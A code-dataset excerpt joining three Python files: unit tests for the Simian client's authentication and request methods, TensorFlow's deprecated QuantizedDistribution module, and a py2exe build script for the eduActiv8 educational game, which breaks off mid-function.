"""Test HttpsAuthClient."""
def setUp(self):
super(HttpsAuthClientTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.hostname = 'hostname'
self.port = None
self.client = client.HttpsAuthClient(self.hostname)
self.fs = fake_filesystem.FakeFilesystem()
fake_os = fake_filesystem.FakeOsModule(self.fs)
self.fake_open = fake_filesystem.FakeFileOpen(self.fs)
self.stubs.Set(client, 'os', fake_os)
def tearDown(self):
super(HttpsAuthClientTest, self).tearDown()
self.stubs.UnsetAll()
@mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain')
def testInit(self, _):
"""Test __init__()."""
c = client.HttpsAuthClient(self.hostname)
self.assertEqual(c._auth1, None)
self.assertEqual(c._cookie_token, None)
def testPlatformSetup(self):
"""Test PlatformSetup()."""
with mock.patch.object(client.platform, 'system', return_value='Darwin'):
self.client.facter_cache_path = 'x'
self.client._PlatformSetup()
self.assertEqual(
self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH)
with mock.patch.object(client.platform, 'system', return_value='other'):
self.client.facter_cache_path = 'x'
self.client._PlatformSetup()
self.assertEqual(
self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH)
def testGetFacter(self):
"""Test GetFacter()."""
st_dt = client.datetime.datetime.now()
facter = {'foo': 'bar', 'one': '1'}
file_path = '/x'
lines = [
'foo => bar',
'one => 1',
'I_am_invalid',
]
fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines))
fake_file.st_uid = 0
fake_file.st_mtime = int(st_dt.strftime('%s'))
self.client.facter_cache_path = file_path
with mock.patch.object(client.os, 'geteuid', return_value=0):
self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open))
def testGetFacterWhenInsecureFileForRoot(self):
"""Test GetFacter()."""
file_path = '/x'
self.client.facter_cache_path = file_path
fake_file = self.fs.CreateFile(file_path)
fake_file.st_uid = 100
# root
with mock.patch.object(client.os, 'geteuid', return_value=0):
fake_open = mock.Mock()
self.assertEqual({}, self.client.GetFacter(open_fn=fake_open))
fake_open.assert_not_called()
# same regular user
with mock.patch.object(client.os, 'geteuid', return_value=200):
fake_open = mock.Mock()
self.assertEqual({}, self.client.GetFacter(open_fn=fake_open))
fake_open.assert_not_called()
@mock.patch.object(client.os.path, 'isfile', return_value=False)
def testGetFacterWhenCacheDoesNotExist(self, _):
"""Test GetFacter() with a nonexistent cache file."""
self.client.facter_cache_path = '/x'
self.assertEqual({}, self.client.GetFacter())
def testGetFacterWhenCachePathIsNone(self):
"""Test GetFacter() with facter_cache_path is None."""
self.client.facter_cache_path = None
self.assertEqual({}, self.client.GetFacter())
def testGetAuthTokenFromHeadersSuccess(self):
token = '%s=123; secure; httponly;' % auth.AUTH_TOKEN_COOKIE
result = self.client._GetAuthTokenFromHeaders(
{'set-cookie': 'other=value;,%s,something=else;' % token})
self.assertEqual(token, result)
def testGetAuthTokenFromHeadersMissingHeader(self):
self.assertRaises(
client.SimianClientError,
self.client._GetAuthTokenFromHeaders,
{'set-cookie': ''})
class SimianClientTest(basetest.TestCase):
"""Test SimianClient class."""
def setUp(self):
self.hostname = 'hostname'
self.port = None
self.client = client.SimianClient(self.hostname)
def testInitWithoutHostname(self):
"""Test __init__() without a hostname passed."""
user = 'foouser'
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value=user):
clienttmp = client.SimianClient()
self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME)
self.assertEqual(clienttmp._user, user)
def testInitWithHostname(self):
"""Test __init__() with a hostname passed."""
user = 'foouser'
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value=user):
clienttmp = client.SimianClient('foo')
self.assertEqual(clienttmp.hostname, 'foo')
self.assertEqual(clienttmp._user, user)
def testInitAsRoot(self):
"""Test __init__() with a hostname passed."""
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value='root'):
self.assertRaises(client.SimianClientError, client.SimianClient)
def testIsDefaultHostClient(self):
"""Test IsDefaultHostClient()."""
self.client._default_hostname = 'foo'
self.assertEqual(self.client.IsDefaultHostClient(), 'foo')
def testSimianRequest(self):
"""Test _SimianRequest()."""
method = 'zGET'
url = '/url'
headers = {'foo': 'bar'}
output_filename = None
good_response = client.Response(status=200, body='hello there')
with mock.patch.object(
self.client, 'Do', return_value=good_response) as do_mock:
self.assertEqual(
good_response.body,
self.client._SimianRequest(method, url, headers=headers))
do_mock.assert_called_once_with(
method, url, body=None, headers=headers,
output_filename=output_filename)
def testSimianRequestWithError(self):
"""Test _SimianRequest() with an error status returned."""
method = 'zGET'
url = '/url'
headers = {'foo': 'bar'}
output_filename = None
error_response = client.Response(status=401, body='fooerror')
with mock.patch.object(
self.client, 'Do', return_value=error_response) as do_mock:
self.assertRaises(
client.SimianServerError,
self.client._SimianRequest, method, url, headers=headers)
do_mock.assert_called_once_with(
method, url, body=None, headers=headers,
output_filename=output_filename)
def GenericStubTestAndReturn(
self,
method,
method_return,
method_args,
stub_method_name, stub_method_return, *stub_args, **stub_kwargs):
"""Helper test method.
Args:
method: method, to invoke in the test
method_return: any, value to expect from method
method_args: list, arguments to send to method during test
stub_method_name: str, method name to stub out in SimianClient class
stub_method_return: any, value to return from stubbed method call
stub_args: list, args to expect when calling stub_method_name
stub_kwargs: dict, kwargs to expect when calling stub_method_name
"""
with mock.patch.object(
self.client,
stub_method_name,
return_value=stub_method_return) as m:
got_rv = method(*method_args)
self.assertEqual(got_rv, method_return)
m.assert_called_once_with(*stub_args, **stub_kwargs)
def GenericStubTest(
self,
method, method_args,
stub_method_name, *stub_args, **stub_kwargs):
"""Helper test method.
Args:
method: method, to invoke in the test
method_args: list, arguments to send to method during test
stub_method_name: str, method name to stub out in SimianClient class
stub_args: list, args to expect when calling stub_method_name
stub_kwargs: dict, kwargs to expect when calling stub_method_name
Returns:
string, 'returnval'
"""
rv = 'returnval'
return self.GenericStubTestAndReturn(
method, rv, method_args,
stub_method_name, rv, *stub_args, **stub_kwargs)
def testGetCatalog(self):
"""Test GetCatalog()."""
name = 'name'
self.GenericStubTest(
self.client.GetCatalog, [name],
'_SimianRequest', 'GET', '/catalog/%s' % name)
def testGetManifest(self):
"""Test GetManifest()."""
name = 'name'
self.GenericStubTest(
self.client.GetManifest, [name],
'_SimianRequest', 'GET', '/manifest/%s' % name)
def testGetPackage(self):
"""Test GetPackage()."""
name = 'name'
self.GenericStubTest(
self.client.GetPackage, [name],
'_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None)
def testGetPackageInfo(self):
"""Test GetPackageInfo()."""
filename = 'name.dmg'
response = mock.create_autospec(httplib.HTTPResponse)
response.body = 'hello'
self.GenericStubTestAndReturn(
self.client.GetPackageInfo,
'hello',
[filename],
'_SimianRequest',
response,
'GET', '/pkgsinfo/%s' % filename, full_response=True)
def testGetPackageInfoWhenHash(self):
"""Test GetPackageInfo()."""
filename = 'name.dmg'
response = mock.create_autospec(httplib.HTTPResponse)
response.body = 'body'
response.headers = {'x-pkgsinfo-hash': 'hash'}
self.GenericStubTestAndReturn(
self.client.GetPackageInfo, ('hash', 'body'),
[filename, True],
'_SimianRequest',
response,
'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True)
def testDownloadPackage(self):
"""Test DownloadPackage()."""
filename = 'foo'
self.GenericStubTest(
self.client.DownloadPackage,
[filename],
'_SimianRequest', 'GET',
'/pkgs/%s' % filename, output_filename=filename)
def testPostReport(self):
"""Test PostReport()."""
report_type = 'foo'
params = {'bar': 1}
url = '/reports'
body = '_report_type=%s&%s' % (
report_type,
client.urllib.urlencode(params, doseq=True))
self.GenericStubTest(
self.client.PostReport, [report_type, params],
'_SimianRequest', 'POST', url, body)
def testPostReportWhenFeedback(self):
"""Test PostReport()."""
report_type = 'foo'
params = {'bar': 1}
url = '/reports'
body = '_report_type=%s&%s&_feedback=1' % (
report_type,
client.urllib.urlencode(params, doseq=True))
self.GenericStubTest(
self.client.PostReport, [report_type, params, True],
'_SimianRequest', 'POST', url, body)
def testPostReportBody(self):
"""Test PostReportBody()."""
url = '/reports'
body = 'foo'
self.GenericStubTest(
self.client.PostReportBody, [body],
'_SimianRequest', 'POST', url, body)
def testPostReportBodyWhenFeedback(self):
"""Test PostReportBody()."""
url = '/reports'
body = 'foo'
body_with_feedback = 'foo&_feedback=1'
self.GenericStubTest(
self.client.PostReportBody, [body, True],
'_SimianRequest', 'POST', url, body_with_feedback)
@mock.patch.object(client.os.path, 'isfile', return_value=True)
def testUploadFile(self, _):
"""Test UploadFile()."""
file_type = 'log'
file_name = 'file.log'
file_path = 'path/to/' + file_name
url = '/uploadfile/%s/%s' % (file_type, file_name)
mock_file = mock.create_autospec(file)
mock_open = mock.Mock(return_value=mock_file)
with mock.patch.object(self.client, 'Do') as mock_do:
self.client.UploadFile(file_path, file_type, _open=mock_open)
mock_do.assert_called_once_with('PUT', url, mock_file)
@mock.patch.object(client.logging, 'error', autospec=True)
@mock.patch.object(client.os.path, 'isfile', return_value=False)
def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error):
"""Test UploadFile() when the file is not found."""
file_path = 'path/to/file.log'
self.client.UploadFile(file_path, 'foo-file-type')
mock_logging_error.assert_called_once_with(
'UploadFile file not found: %s', file_path)
mock_isfile.assert_called_once_with(file_path)
class SimianAuthClientTest(basetest.TestCase):
"""Test SimianAuthClient class."""
def setUp(self):
super(SimianAuthClientTest, self).setUp()
self.pac = client.SimianAuthClient()
def testGetAuthToken(self):
"""Test GetAuthToken()."""
with mock.patch.object(self.pac, 'DoSimianAuth'):
self.pac._cookie_token = 'token'
self.assertEqual(self.pac.GetAuthToken(), 'token')
def testLogoutAuthToken(self):
"""Test LogoutAuthToken()."""
url = '/auth?logout=True'
with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'):
self.assertTrue(self.pac.LogoutAuthToken())
self.pac._SimianRequest.assert_called_once_with('GET', url)
def testLogoutAuthTokenWhenFail(self):
"""Test LogoutAuthToken()."""
url = '/auth?logout=True'
with mock.patch.object(
self.pac, '_SimianRequest', side_effect=client.SimianServerError):
self.assertFalse(self.pac.LogoutAuthToken())
self.pac._SimianRequest.assert_called_once_with('GET', url)
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
basetest.main()
if __name__ == '__main__':
app.run()
| apache-2.0 | 469,666,702,062,268,740 | 32.770227 | 80 | 0.669526 | false |
alsrgv/tensorflow | tensorflow/contrib/distributions/python/ops/quantized_distribution.py | 22 | 20681 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Quantized distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import distribution as distributions
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
__all__ = ["QuantizedDistribution"]
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def _logsum_expbig_minus_expsmall(big, small):
"""Stable evaluation of `Log[exp{big} - exp{small}]`.
To work correctly, we should have the pointwise relation: `small <= big`.
Args:
big: Floating-point `Tensor`
small: Floating-point `Tensor` with same `dtype` as `big` and broadcastable
shape.
Returns:
`Tensor` of same `dtype` of `big` and broadcast shape.
"""
with ops.name_scope("logsum_expbig_minus_expsmall", values=[small, big]):
return math_ops.log(1. - math_ops.exp(small - big)) + big
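# Illustrative note (not part of the original module): the naive form
# log(exp(big) - exp(small)) overflows in float64 once `big` exceeds roughly
# 709, while the factored form stays finite because exp(small - big) <= 1.
# A rough sketch of the identity with plain NumPy scalars, shown only as a
# comment:
#
#   big, small = 1000.0, 998.0
#   np.log(np.exp(big) - np.exp(small))     # inf - inf -> nan
#   np.log(1. - np.exp(small - big)) + big  # ~999.8546, stays finite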
_prob_base_note = """
For whole numbers `y`,
```
P[Y = y] := P[X <= low], if y == low,
:= P[X > high - 1], y == high,
         := 0, if y < low or y > high,
:= P[y - 1 < X <= y], all other y.
```
"""
_prob_note = _prob_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`. If the
base distribution has a `survival_function` method, results will be more
accurate for large values of `y`, and in this case the `survival_function` must
also be defined on `y - 1`.
"""
_log_prob_note = _prob_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`. If the
base distribution has a `log_survival_function` method results will be more
accurate for large values of `y`, and in this case the `log_survival_function`
must also be defined on `y - 1`.
"""
_cdf_base_note = """
For whole numbers `y`,
```
cdf(y) := P[Y <= y]
= 1, if y >= high,
= 0, if y < low,
= P[X <= y], otherwise.
```
Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`.
This dictates that fractional `y` are first floored to a whole number, and
then above definition applies.
"""
_cdf_note = _cdf_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`.
"""
_log_cdf_note = _cdf_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`.
"""
_sf_base_note = """
For whole numbers `y`,
```
survival_function(y) := P[Y > y]
= 0, if y >= high,
= 1, if y < low,
                      = P[X > y], otherwise.
```
Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`.
This dictates that fractional `y` are first floored to a whole number, and
then above definition applies.
"""
_sf_note = _sf_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`.
"""
_log_sf_note = _sf_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`.
"""
class QuantizedDistribution(distributions.Distribution):
"""Distribution representing the quantization `Y = ceiling(X)`.
#### Definition in Terms of Sampling
```
1. Draw X
2. Set Y <-- ceiling(X)
3. If Y < low, reset Y <-- low
4. If Y > high, reset Y <-- high
5. Return Y
```
#### Definition in Terms of the Probability Mass Function
Given scalar random variable `X`, we define a discrete random variable `Y`
supported on the integers as follows:
```
P[Y = j] := P[X <= low], if j == low,
:= P[X > high - 1], j == high,
:= 0, if j < low or j > high,
:= P[j - 1 < X <= j], all other j.
```
Conceptually, without cutoffs, the quantization process partitions the real
line `R` into half open intervals, and identifies an integer `j` with the
right endpoints:
```
R = ... (-2, -1](-1, 0](0, 1](1, 2](2, 3](3, 4] ...
j = ... -1 0 1 2 3 4 ...
```
`P[Y = j]` is the mass of `X` within the `jth` interval.
If `low = 0`, and `high = 2`, then the intervals are redrawn
and `j` is re-assigned:
```
R = (-infty, 0](0, 1](1, infty)
j = 0 1 2
```
`P[Y = j]` is still the mass of `X` within the `jth` interval.
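  As a worked illustration of the definition above: with `low = 0`,
  `high = 2`, and a standard normal `X`, `P[Y = 0] = P[X <= 0] = 0.5`,
  `P[Y = 1] = P[0 < X <= 1] ~= 0.34`, and `P[Y = 2] = P[X > 1] ~= 0.16`,
  which sum to one.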
#### Examples
We illustrate a mixture of discretized logistic distributions
[(Salimans et al., 2017)][1]. This is used, for example, for capturing 16-bit
audio in WaveNet [(van den Oord et al., 2017)][2]. The values range in
a 1-D integer domain of `[0, 2**16-1]`, and the discretization captures
`P(x - 0.5 < X <= x + 0.5)` for all `x` in the domain excluding the endpoints.
The lowest value has probability `P(X <= 0.5)` and the highest value has
probability `P(2**16 - 1.5 < X)`.
Below we assume a `wavenet` function. It takes as `input` right-shifted audio
samples of shape `[..., sequence_length]`. It returns a real-valued tensor of
shape `[..., num_mixtures * 3]`, i.e., each mixture component has a `loc` and
`scale` parameter belonging to the logistic distribution, and a `logits`
parameter determining the unnormalized probability of that component.
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
tfb = tfp.bijectors
net = wavenet(inputs)
loc, unconstrained_scale, logits = tf.split(net,
num_or_size_splits=3,
axis=-1)
scale = tf.nn.softplus(unconstrained_scale)
# Form mixture of discretized logistic distributions. Note we shift the
# logistic distribution by -0.5. This lets the quantization capture "rounding"
# intervals, `(x-0.5, x+0.5]`, and not "ceiling" intervals, `(x-1, x]`.
discretized_logistic_dist = tfd.QuantizedDistribution(
distribution=tfd.TransformedDistribution(
distribution=tfd.Logistic(loc=loc, scale=scale),
bijector=tfb.AffineScalar(shift=-0.5)),
low=0.,
high=2**16 - 1.)
mixture_dist = tfd.MixtureSameFamily(
mixture_distribution=tfd.Categorical(logits=logits),
components_distribution=discretized_logistic_dist)
neg_log_likelihood = -tf.reduce_sum(mixture_dist.log_prob(targets))
train_op = tf.train.AdamOptimizer().minimize(neg_log_likelihood)
```
After instantiating `mixture_dist`, we illustrate maximum likelihood by
calculating its log-probability of audio samples as `target` and optimizing.
#### References
[1]: Tim Salimans, Andrej Karpathy, Xi Chen, and Diederik P. Kingma.
PixelCNN++: Improving the PixelCNN with discretized logistic mixture
likelihood and other modifications.
_International Conference on Learning Representations_, 2017.
https://arxiv.org/abs/1701.05517
[2]: Aaron van den Oord et al. Parallel WaveNet: Fast High-Fidelity Speech
Synthesis. _arXiv preprint arXiv:1711.10433_, 2017.
https://arxiv.org/abs/1711.10433
"""
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def __init__(self,
distribution,
low=None,
high=None,
validate_args=False,
name="QuantizedDistribution"):
"""Construct a Quantized Distribution representing `Y = ceiling(X)`.
Some properties are inherited from the distribution defining `X`. Example:
`allow_nan_stats` is determined for this `QuantizedDistribution` by reading
the `distribution`.
Args:
distribution: The base distribution class to transform. Typically an
instance of `Distribution`.
low: `Tensor` with same `dtype` as this distribution and shape
able to be added to samples. Should be a whole number. Default `None`.
If provided, base distribution's `prob` should be defined at
`low`.
high: `Tensor` with same `dtype` as this distribution and shape
able to be added to samples. Should be a whole number. Default `None`.
If provided, base distribution's `prob` should be defined at
`high - 1`.
`high` must be strictly greater than `low`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
name: Python `str` name prefixed to Ops created by this class.
Raises:
      TypeError: If `distribution` is not an instance of
          `Distribution` or is not continuous.
NotImplementedError: If the base distribution does not implement `cdf`.
"""
parameters = dict(locals())
values = (
list(distribution.parameters.values()) +
[low, high])
with ops.name_scope(name, values=values) as name:
self._dist = distribution
if low is not None:
low = ops.convert_to_tensor(low, name="low")
if high is not None:
high = ops.convert_to_tensor(high, name="high")
check_ops.assert_same_float_dtype(
tensors=[self.distribution, low, high])
# We let QuantizedDistribution access _graph_parents since this class is
# more like a baseclass.
graph_parents = self._dist._graph_parents # pylint: disable=protected-access
checks = []
if validate_args and low is not None and high is not None:
message = "low must be strictly less than high."
checks.append(
check_ops.assert_less(
low, high, message=message))
self._validate_args = validate_args # self._check_integer uses this.
with ops.control_dependencies(checks if validate_args else []):
if low is not None:
self._low = self._check_integer(low)
graph_parents += [self._low]
else:
self._low = None
if high is not None:
self._high = self._check_integer(high)
graph_parents += [self._high]
else:
self._high = None
super(QuantizedDistribution, self).__init__(
dtype=self._dist.dtype,
reparameterization_type=distributions.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=self._dist.allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=name)
@property
def distribution(self):
"""Base distribution, p(x)."""
return self._dist
@property
def low(self):
"""Lowest value that quantization returns."""
return self._low
@property
def high(self):
"""Highest value that quantization returns."""
return self._high
def _batch_shape_tensor(self):
return self.distribution.batch_shape_tensor()
def _batch_shape(self):
return self.distribution.batch_shape
def _event_shape_tensor(self):
return self.distribution.event_shape_tensor()
def _event_shape(self):
return self.distribution.event_shape
def _sample_n(self, n, seed=None):
low = self._low
high = self._high
with ops.name_scope("transform"):
n = ops.convert_to_tensor(n, name="n")
x_samps = self.distribution.sample(n, seed=seed)
ones = array_ops.ones_like(x_samps)
# Snap values to the intervals (j - 1, j].
result_so_far = math_ops.ceil(x_samps)
if low is not None:
result_so_far = array_ops.where(result_so_far < low,
low * ones, result_so_far)
if high is not None:
result_so_far = array_ops.where(result_so_far > high,
high * ones, result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_log_prob_note)
def _log_prob(self, y):
if not hasattr(self.distribution, "_log_cdf"):
raise NotImplementedError(
"'log_prob' not implemented unless the base distribution implements "
"'log_cdf'")
y = self._check_integer(y)
try:
return self._log_prob_with_logsf_and_logcdf(y)
except NotImplementedError:
return self._log_prob_with_logcdf(y)
def _log_prob_with_logcdf(self, y):
return _logsum_expbig_minus_expsmall(self.log_cdf(y), self.log_cdf(y - 1))
def _log_prob_with_logsf_and_logcdf(self, y):
"""Compute log_prob(y) using log survival_function and cdf together."""
# There are two options that would be equal if we had infinite precision:
# Log[ sf(y - 1) - sf(y) ]
# = Log[ exp{logsf(y - 1)} - exp{logsf(y)} ]
# Log[ cdf(y) - cdf(y - 1) ]
# = Log[ exp{logcdf(y)} - exp{logcdf(y - 1)} ]
logsf_y = self.log_survival_function(y)
logsf_y_minus_1 = self.log_survival_function(y - 1)
logcdf_y = self.log_cdf(y)
logcdf_y_minus_1 = self.log_cdf(y - 1)
# Important: Here we use select in a way such that no input is inf, this
# prevents the troublesome case where the output of select can be finite,
# but the output of grad(select) will be NaN.
# In either case, we are doing Log[ exp{big} - exp{small} ]
# We want to use the sf items precisely when we are on the right side of the
# median, which occurs when logsf_y < logcdf_y.
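    # Illustrative numbers (an assumption for exposition, not from the original
    # code): in float32, for y deep in the right tail, cdf(y) and cdf(y - 1)
    # both round to 1., so exp{logcdf(y)} - exp{logcdf(y - 1)} cancels to zero,
    # while logsf(y - 1) and logsf(y) stay well separated (e.g. -27.6 vs -28.3)
    # and the difference of their exps keeps several significant digits.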
big = array_ops.where(logsf_y < logcdf_y, logsf_y_minus_1, logcdf_y)
small = array_ops.where(logsf_y < logcdf_y, logsf_y, logcdf_y_minus_1)
return _logsum_expbig_minus_expsmall(big, small)
@distribution_util.AppendDocstring(_prob_note)
def _prob(self, y):
if not hasattr(self.distribution, "_cdf"):
raise NotImplementedError(
"'prob' not implemented unless the base distribution implements "
"'cdf'")
y = self._check_integer(y)
try:
return self._prob_with_sf_and_cdf(y)
except NotImplementedError:
return self._prob_with_cdf(y)
def _prob_with_cdf(self, y):
return self.cdf(y) - self.cdf(y - 1)
def _prob_with_sf_and_cdf(self, y):
# There are two options that would be equal if we had infinite precision:
# sf(y - 1) - sf(y)
# cdf(y) - cdf(y - 1)
sf_y = self.survival_function(y)
sf_y_minus_1 = self.survival_function(y - 1)
cdf_y = self.cdf(y)
cdf_y_minus_1 = self.cdf(y - 1)
# sf_prob has greater precision iff we're on the right side of the median.
return array_ops.where(
sf_y < cdf_y, # True iff we're on the right side of the median.
sf_y_minus_1 - sf_y,
cdf_y - cdf_y_minus_1)
@distribution_util.AppendDocstring(_log_cdf_note)
def _log_cdf(self, y):
low = self._low
high = self._high
# Recall the promise:
# cdf(y) := P[Y <= y]
# = 1, if y >= high,
# = 0, if y < low,
# = P[X <= y], otherwise.
# P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in
# between.
j = math_ops.floor(y)
result_so_far = self.distribution.log_cdf(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
neg_inf = -np.inf * array_ops.ones_like(result_so_far)
result_so_far = array_ops.where(j < low, neg_inf, result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.zeros_like(result_so_far),
result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_cdf_note)
def _cdf(self, y):
low = self._low
high = self._high
# Recall the promise:
# cdf(y) := P[Y <= y]
# = 1, if y >= high,
# = 0, if y < low,
# = P[X <= y], otherwise.
# P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in
# between.
j = math_ops.floor(y)
# P[X <= j], used when low < X < high.
result_so_far = self.distribution.cdf(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.zeros_like(result_so_far),
result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.ones_like(result_so_far),
result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_log_sf_note)
def _log_survival_function(self, y):
low = self._low
high = self._high
# Recall the promise:
# survival_function(y) := P[Y > y]
# = 0, if y >= high,
# = 1, if y < low,
# = P[X > y], otherwise.
# P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in
# between.
j = math_ops.ceil(y)
# P[X > j], used when low < X < high.
result_so_far = self.distribution.log_survival_function(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.zeros_like(result_so_far),
result_so_far)
if high is not None:
neg_inf = -np.inf * array_ops.ones_like(result_so_far)
result_so_far = array_ops.where(j >= high, neg_inf, result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_sf_note)
def _survival_function(self, y):
low = self._low
high = self._high
# Recall the promise:
# survival_function(y) := P[Y > y]
# = 0, if y >= high,
# = 1, if y < low,
# = P[X > y], otherwise.
# P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in
# between.
j = math_ops.ceil(y)
# P[X > j], used when low < X < high.
result_so_far = self.distribution.survival_function(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.ones_like(result_so_far),
result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.zeros_like(result_so_far),
result_so_far)
return result_so_far
def _check_integer(self, value):
with ops.name_scope("check_integer", values=[value]):
value = ops.convert_to_tensor(value, name="value")
if not self.validate_args:
return value
dependencies = [distribution_util.assert_integer_form(
value, message="value has non-integer components.")]
return control_flow_ops.with_dependencies(dependencies, value)
| apache-2.0 | 6,102,863,444,865,605,000 | 34.231687 | 83 | 0.6138 | false |
imiolek-ireneusz/eduActiv8 | eduactiv82exe.py | 1 | 6732 | # -*- coding: utf8 -*-
# This will create a dist directory containing the executable file, all the data
# directories. All Libraries will be bundled in executable file.
#
# Run the build process by entering 'pygame2exe.py' or
# 'python pygame2exe.py' in a console prompt.
#
# To build the exe, Python, pygame, and py2exe have to be installed. After
# building the exe none of these libraries are needed.
# Please note: keep a backup copy in a different directory, because if the build
# crashes you will lose it all! (I lost 6 months of work because I did not do this.)
# http://pygame.org/wiki/Pygame2exe
try:
from distutils.core import setup
import py2exe, pygame
from modulefinder import Module
import glob, fnmatch
import sys, os, shutil
import operator
import appdirs
import packaging
except ImportError, message:
raise SystemExit, "Unable to load module. %s" % message
# hack which fixes the pygame mixer and pygame font
origIsSystemDLL = py2exe.build_exe.isSystemDLL # save the original before we edit it
def isSystemDLL(pathname):
# checks if the freetype and ogg dll files are being included
if os.path.basename(pathname).lower() in (
"libfreetype-6.dll", "libogg-0.dll", "sdl_ttf.dll"): # "sdl_ttf.dll" added by arit.
return 0
    return origIsSystemDLL(pathname) # return the original function
py2exe.build_exe.isSystemDLL = isSystemDLL # override the default function with this one
class pygame2exe(
py2exe.build_exe.py2exe): # This hack make sure that pygame default font is copied: no need to modify code for specifying default font
def copy_extensions(self, extensions):
# Get pygame default font
pygamedir = os.path.split(pygame.base.__file__)[0]
pygame_default_font = os.path.join(pygamedir, pygame.font.get_default_font())
# Add font to list of extension to be copied
extensions.append(Module("pygame.font", pygame_default_font))
py2exe.build_exe.py2exe.copy_extensions(self, extensions)
class BuildExe:
def __init__(self):
# Name of starting .py
self.script = "eduactiv8.py"
# Name of program
self.project_name = "eduActiv8"
# Project url
self.project_url = "https://www.eduactiv8.org"
# Version of program
self.project_version = "1.0"
# License of the program
self.license = "GPL3"
        # Author of program
self.author_name = "Ireneusz Imiolek"
self.author_email = "[email protected]"
self.copyright = "Copyright (c) 2012-2019 Ireneusz Imiolek"
# Description
self.project_description = "eduActiv8 - Educational Activities for Kids"
# Icon file (None will use pygame default icon)
self.icon_file = os.path.join("res", "icon", "eduactiv8.ico")
# Extra files/dirs copied to game
self.extra_datas = ["classes", "game_boards", "i18n", "locale", "res", "xml"]
# Extra/excludes python modules
self.extra_modules = ['appdirs', 'packaging']
        # modules reported missing in the resulting compilation
self.exclude_modules = []
# DLL Excludes
self.exclude_dll = ['']
        # python scripts (strings) to be included, separated by a comma
self.extra_scripts = []
# Zip file name (None will bundle files in exe instead of zip file)
self.zipfile_name = None
# Dist directory
self.dist_dir = 'dist'
# Code from DistUtils tutorial at http://wiki.python.org/moin/Distutils/Tutorial
# Originally borrowed from wxPython's setup and config files
def opj(self, *args):
path = os.path.join(*args)
return os.path.normpath(path)
def find_data_files(self, srcdir, *wildcards, **kw):
# get a list of all files under the srcdir matching wildcards,
# returned in a format to be used for install_data
def walk_helper(arg, dirname, files):
if '.svn' in dirname:
return
names = []
lst, wildcards = arg
for wc in wildcards:
wc_name = self.opj(dirname, wc)
for f in files:
filename = self.opj(dirname, f)
